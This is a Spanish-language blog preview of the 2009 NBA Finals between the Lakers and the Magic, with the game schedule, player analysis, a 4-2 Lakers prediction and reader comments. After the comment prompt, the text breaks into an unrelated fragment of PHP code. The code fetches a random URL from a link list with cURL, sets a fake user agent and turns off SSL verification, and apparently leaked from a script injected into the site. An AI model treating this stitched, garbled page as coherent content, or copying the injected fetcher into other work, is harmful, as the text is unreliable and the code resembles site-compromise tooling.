La previa de las Finales 2009: Lakers vs Magic

03 de June de 2009 por MagicJohnson32

Los Angeles Lakers y Orlando Magic disputarán a partir de la madrugada del jueves 4 al viernes 5 las Finales de la NBA 2009. Mientras David Stern llora la ausencia de LeBron James, repasamos el calendario de partidos, que se disputarán de nuevo con el formato 2-3-2:trophylalmagiceast

1. Magic @ Lakers – Jueves 4 (3.00 h)

2. Magic @ Lakers – Domingo 7 (2.00 h)

3. Lakers @ Magic – Martes 9 (3.00 h)

4. Lakers @ Magic – Jueves 11 (3.00 h)

5. Lakers @ Magic – Domingo 14 (2.00 h)

6. Magic @ Lakers – Martes 16 (3.00 h)

7. Magic @ Lakers – Jueves 18 (3.00 h)

LAS ESTRELLAS

Tal vez los dos mejores jugadores de la liga en sus respectivas posiciones se han encargado de liderar a Lakers y Magic a las Finales. Uno de los mayores talentos anotadores de la historia de este deporte contra la más impresionante fuerza de la Naturaleza que ha pisado una pista desde la irrupción de Shaquille O’Neal. Kobe contra Dwight. Es más que una previsión, casi una certeza, que Bryant anotará mucho y que Howard dominará las zonas, pero hay formas y formas. El escolta, que disputará las sextas Finales de su carrera, ha de mantener la línea de juego inteligente, efectivo y, sobre todo, involucrando a los secundarios mientras éstos respondan como lo han hecho en los dos últimos partidos de la final del Oeste. En defensa no tendrá que trabajar como lo hizo ante Billups y, ocasionalmente, ante Carmelo, con lo que posiblemente evitará la fatiga que acusó en ciertos momentos de la serie ante los Nuggets. Necesitará las energías en ataque, ya que se encontrará primero Pietrus, un jugador con un físico adecuado para dificultarle las cosas, y después con el Mejor Jugador Defensivo de la kobefisttemporada. De la capacidad de Bryant de zafarse de su marcador y atacar a Howard dependerá buena parte del destino del Anillo. Los problemas de faltas han sido una constante para el pívot de los Magic, especialmente en la serie contra los Cavs. En 3 de los seis partidos Howard fue eliminado, y en otros dos acabó con 5 faltas. Eso no le ha impedido resultar determinante e imponer el terror bajo los aros. Para colmo, ha estado acertado desde la línea de tiros libres. Ante los Cavs firmó un 70% en este apartado, en la línea de unas estadísticas que reflejan unas actuaciones demoledoras ante las que poco pudieron hacer Ilgauskas, Varejao y Wallace. Difícilmente podrán Bynum y Gasol.

pauhighLOS SECUNDARIOS

Que no se me malinterprete al hablar de Pau Gasol como “secundario”. Paul Newman fue un secundario en “Camino a la Perdición”, y a Kevin Spacey se le consideró un secundario en “Sospechosos habituales”. Gasol es de esa clase de secundario. De la clase de secundario sin cuya presencia no sería posible la película. Un secundario que carga con un grado de exigencia brutal desde su llegada al equipo en febrero de 2008. De hecho, desde entonces la importancia de Gasol en los Lakers no ha hecho más que crecer ya que, frente a la irregularidad intrínseca de la mayoría de sus compañeros, el pívot de Sant Boi presenta como principal virtud su consistencia, su capacidad para aportar de una u otra manera a partir de un talento ofensivo excepcional: suma 9 dobles-dobles consecutivos para un total de 11 en los 13 partidos de Playoffs y ha anotado en dobles figuras en los últimos 89 partidos. Ante los Magic, Gasol intercambiará asignaciones entre Rashard Lewis y Dwight Howard en función del tiempo que comparta con Bynum (y la velocidad con la que éste se cargue de faltas). En ataque, Pau tendrá la responsabilidad de atacar a Howard siempre que se empareje con él, exigir su atención ya sea para sacarle faltas o bien para dejar vía libre a otros compañeros. Cuando su marcador sea Lewis, Gasol ha de sacar todo el provecho que la diferencia de envergadura le otorga.

hedoOtro jugador que se ha ganado a pulso un altísimo grado de trascendencia es Hedo Turkoglu. El mejor point-forward de la temporada, LeBron al margen, posee una incidencia en el juego de los Magic que va más allá de sus números. De hecho, sus estadísticas en Playoffs nos dicen que está fallón en el tiro (supera apenas el 40%) pero lidera a los suyos en asistencias y es quien suele asumir la responsabilidad en los momentos decisivos. No en vano, su mejor actuación en esta postemporada llegó en el séptimo partido ante los Celtics. Ante los Lakers tendrá frente a él a Ariza, Odom y, ocasionalmente, a Walton, jugadores que se han mostrado capaces de frenar la efectividad anotadora de Carmelo Anthony. Turkoglu, sin embargo, produce más allá de la anotación, y ese ha de ser su rol en las Finales.

Para anotar ya disponen los Magic de Rashard Lewis, que está funcionando como un reloj: no ha anotado menos de 14 puntos en todos los Playoffs en un papel esencial para los esquemas de Van Gundy, el de abrir el campo y crear espacios para Howard. Phil Jackson se encontrará con el dilema de situar a Gasol sobre Lewis en defensa, o bien retirar a Bynum y otorgar a Odom la asignación del ex Sonics y dejar a Pau con Howard. Odom posee las cualidades necesarias para anular a Lewis, pero la irremediable atención que atrae Howard en la zona generará con seguridad tiros abiertos para él.

arizafliesEl papel de Lamar Odom, para variar, es una incógnita. Así ha sido siempre y así lo seguirá siendo. Apenas le habíamos visto después de una notable serie contra los Jazz en primera ronda y empezábamos a darle por perdido cuando se destapó con dos magníficos partidos para sellar la final del Oeste. Dadas las principales amenazas de los Magic, los Lakers necesitarán de él defensa y rebote, y no tanto anotación. Si es capaz de aprovechar la inercia de sus recientes actuaciones para jugar con consistencia ha de asumir el papel de tercer espada del que desertó en el peor momento (tanto para el equipo como para su futuro, puesto que acaba contrato este verano). Si no, la franquicia de Jerry Buss volverá a requerir a un Trevor Ariza al nivel que mostró en determinados partidos ante los Nuggets, intenso en defensa hasta el punto de resultar desequilibrante (recordamos los robos de balón en los partidos 1 y 3 de la serie) y productivo en ataque, especialmente acertado desde la línea de 3 puntos.

El último secundario al que destacamos es Rafer Alston. Llegado desde los Rockets tras la lesión de Jameer Nelson, Alston se ha adaptado a los Magic de un modo que pocos esperaban. Con sus inevitables tiros precipitados y decisiones cuestionables, el primo de Marbury (¿o es al revés?) está mostrando su mejor versión imaginable. A Fisher, tras el descanso que supuso la eliminatoria contra Denver, le corresponde la tarea de evitar que Alston sea determinante. A Alston, por su parte, le toca frenar sus impulsos y aprovechar los recursos de que dispone y que tan bien han funcionado hasta la fecha.

pietrusEL FACTOR X

Andrew Bynum por un lado; Mickael Pietrus por el otro. Si hay un jugador de los Magic que ha elevado sus prestaciones en los Playoffs, ese es el francés. Pietrus suma ocho partidos seguidos anotando más de 10 puntos, cuando su mejor marca en la temporada regular era de 4. Pero el papel de Pietrus en las Finales no acabará ahí. Si es capaz de mantener a Kobe Bryant lejos del aro, obligarlo a lanzar suspensiones forzadas y, sobre todo, evitando que lance tiros libres, los Magic tendrán medio Anillo en el bolsillo. Sí, es fácil decirlo…

El factor X para los Lakers es, ahora y de cara al futuro, Bynum. Firmó a principios de temporada su primer gran contrato, a 14 millones por año. Y, tal y como le había ocurrido la temporada pasada, justo cuando empezaba a mostrar todo su potencial una lesión de rodilla lo frenó en seco. La diferencia es que esta vez ha podido regresar a tiempo de jugar los Playoffs. Sigue lejos del nivel de juego demostrado en el momento de la lesión, pierde la concentración en defensa y le cuesta involucrarse en el ataque, pero los Lakers necesitarán de él ante la que se les viene encima. Probablemente lo veremos en varias ocasiones irse al banquillo con dos o tres faltas a los pocos minutos de juego. Si, en el camino, carga a Howard con alguna falta en ataque o en defensa, ya habrá cumplido.

DE REPARTO

El rookie Courtney Lee es una de las sorpresas agradables de la temporada. Se hizo con un puesto de titular en enero, lo dejó tras ser baja unos partidos después de recibir un codazo de Howard durante la primera ronda, y lo retomó para la eliminatoria contra los Cavaliers. Sin embargo, no parece haber alcanzado su mejor nivel, el que mostró en el tramo final de la regular season. La rotación de los Magic se completará con Anthony Johnson, Marcin Gortat y posiblemente Tony Battie. Según dice el propio jugador, Jameer Nelson jugará durante las Finales. Parece precipitado pero comprensible. En cualquier caso, no esperamos grandes cosas por su parte.

Phil Jackson alarga más la rotación. Los minutos de base que no se queda Derek Fisher, en quien Jackson mantiene su fe pese a sus malos Playoffs, se los reparten Shannon Brown y Farmar. Walton y Vujacic cierran las rotaciones, con alguna aparición puntual de Josh Powell.

magic35 CLAVES

– La capacidad de Howard para intimidar sin meterse en problemas de faltas

– Que la defensa de los Magic pueda reducir el ratio puntos por lanzamiento de Kobe

– Los desequilibrios que sea capaz de generar Gasol desde el poste medio-bajo

– ¿Odom o no Odom? (Ésa es la cuestión)

– El acierto en los triples de los Magic

lakers5PRONÓSTICO

La experiencia que acumulan Kobe, Fisher y Phil Jackson, más la que ganaron Gasol, Odom y compañía el año pasado, sumado al factor cancha, sitúa a los Lakers como favoritos en las que son las 30ª Finales en la historia de la franquicia. Además, vienen de menos a más, respondiendo siempre ante cada incremento en la exigencia que se les ha presentado, y parecen preparados para el reto de sus segundas Finales consecutivas. Los Magic cuentan a su favor con los últimos precedentes entre ambos equipos, las dos victorias que cosecharon en regular season en partidos muy similares resueltos por 103-109 y 106-103.

Mi pronóstico: 4-2 para los Lakers.

Comenta

9 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Impresionante análisis, Magic….

    Bueno, yo creo que aquí pasa un poco como pasó en el caso de Denver. Se parte de una imagen optimista de Orlando y una bastante dudosa de Lakers para equilibrar favoritismos. Yo también creo que, en condiciones normales, los Lakers deben de ser claros favoritos. Aún con el respeto que les tengo a un muy buen equipo como ellos doy también un pronóstico de victoria amarilla en 6.

    Kobe ha pasado por las defensas de Brewer&Kirilenko, Battier&Artest y por el castigo de Dahntay. Y en todas ellas se ha salido por todos lados. Sinceramente creo que tendrá bastante menos problemas contra Pietrus y Lee de los que D-Howard tendrá contra Bynum&Gasol (y que no me extrañaría tampoco ver más minutos de castigo de Mbenga de lo que estamos acostumbrados) Recordemos que supermán ha superado a Dalembert (y para de contar), Perkins (y para de contar) e Ilgauskas… y tampoco es que hayan sido una series verdaderamente explosivas ofensivamente por su parte, y creo que Pau ha resultado ser tradicionalmente bastante molesto contra su juego.

    Por otro lado, con Phil Jackson de por medio veremos muy poco ayudas contra él… y esa será la clave. Me preocupan más la dupla Lewis&Turkoglu, que son los que realmente pueden hacer daño. Son tan sumamente atípicos que generan todavía más dudas en la ya de por sí dudosa línea de intangibles de L.A. No obstante, sí veo al equipo mucho mejor armado contra ellos de lo que estaba Cleveland. Ahí se decidirá todo.
    Pronto veremos lo mucho que nos condiciona el juego la dupla. Si Phil sale con Pau&Odom está claro. Por el otro lado no veo alternativas, así que por ahí también los Lakers llevan ventaja.
    Si por una de esas, el tiro les sale por la culata, no terminan de entrar los tiros (que tampoco sería extraño en Orlando) y Gasol le genera más problemas a Lewis de lo que él le cree no habrá discusión este año.
    Eso sin hablar de que durante el tiempo que D-Howard pase en el banco eso va a ser una sangría en toda regla…. eso sí, qué mal se les da a los Lakers provocar faltas.

      Citar

  2. ÑBA dice:
    #2

    Gran análisis, mi enhorabuena.

    Todos estamos haciendo cábalas, mirando las claves, elucubrando si Odom jugará bien; si Bynum hará o no el ridículo ante Howard; si Nelson jugará…

    ¡Que empiece ya!

      Citar

  3. Dantley2 dice:
    #3

    Mu bueno. Con la de cosas que se leen en la prensa “de pago”, la comparación de la comparativa es odiosa. En fin, ellos se lo pierden.

    Voy a sobresimplificar a lo bestia:

    Howard juega más de 40 minutos por partido (vamos, que evita personales) + Kobe por debajo del 44%, gana Orlando

    Justo lo contrario, gana Lakers

    Pasa una de las dos cosas solamente, secundarios’ time

      Citar

  4. Jabho dice:
    #4

    Buenos pues de acuerdo con las claves y mi cabedza me dice que hay que estar de acuerdo con el pronóstico…

    Creo que los Magic defienden bien. De hecho creo que defienden mucho mejor que cualquier equipo de los que le han tocado a los Lakers en PO, por lo que creo que Bryant si lo tendrá más dificil que en cualquier otra eliminatoria (o parejo a los Rockets y acabó la cosa achuchada). A los Cavs les han apretado mucho las clavijas en defensa y a los Celtics también.

    La clave es el duelo Pau-Howard y que Odom esté bien para frenar a Lewis. De Bynum no espero mucho, bueno nada.

    Ambos equipos vienen de menos a más, creo que losvLakers tienen más pero deben demostrarlo. Los Magic no dieron buenas sensaciones ante los Celtics pero si ante los Cavs. Han sido muy solidos en todos los partidos y en ambos lados de la cancha. La cabeza dice Lakers pero barrunto que no, que será 4-2 pero para los Magic…. Howard dominará la zona y los Lakers pelearan con su indolencia y su falta caracter…

    GO MAGICS…beat LA!!!!! 😉

      Citar

  5. Landrusski dice:
    #5

    Mi pronostico es muy arriesgado pero alla va LAKERS 4 ORLANDO 0 ya se ke me direis tal nose ke…pero bueno XD me da a mi ke kobe se va a salir literalmente y la va a armar gorda vereis….

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    ¿qué tal defensor es Courtney Lee?

    ¿El hecho hecho de ser tocayo de Courtney Love le confiere un plus transgresivo?

      Citar

  7. Hoy comienzan las Finales de la NBA: Lakers-Magic | NBAmaniacs dice:
    #7
  8. Txusma dice:
    #8

    En las claves estamos todos de acuerdo. Kobe hara un roto si o si, pero tb creo que lo hara Dwight Howard el tiempo que este en pista así que esta final depende muy mucho de Pau Gasol. Si es capaz de defender bien a Howard, si le provoca faltas, si adquiere protagonismo ofensivo, si ordena el juego dsd el poste… Si Gasol está a buen nivel, Orlando no tiene nada que hacer. Si los Magic encuentran la manera de frenar a Gasol entonces la cosa se igualará.

    En todo caso los Lakers son los principales favoritos. 4-1 Lakers.

      Citar

  9. toni dice:
    #9

    Mi pronóstico es un 4-2 lakers.
    Las razones son las mismas que casi todos.
    La principal, la defensa de LA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>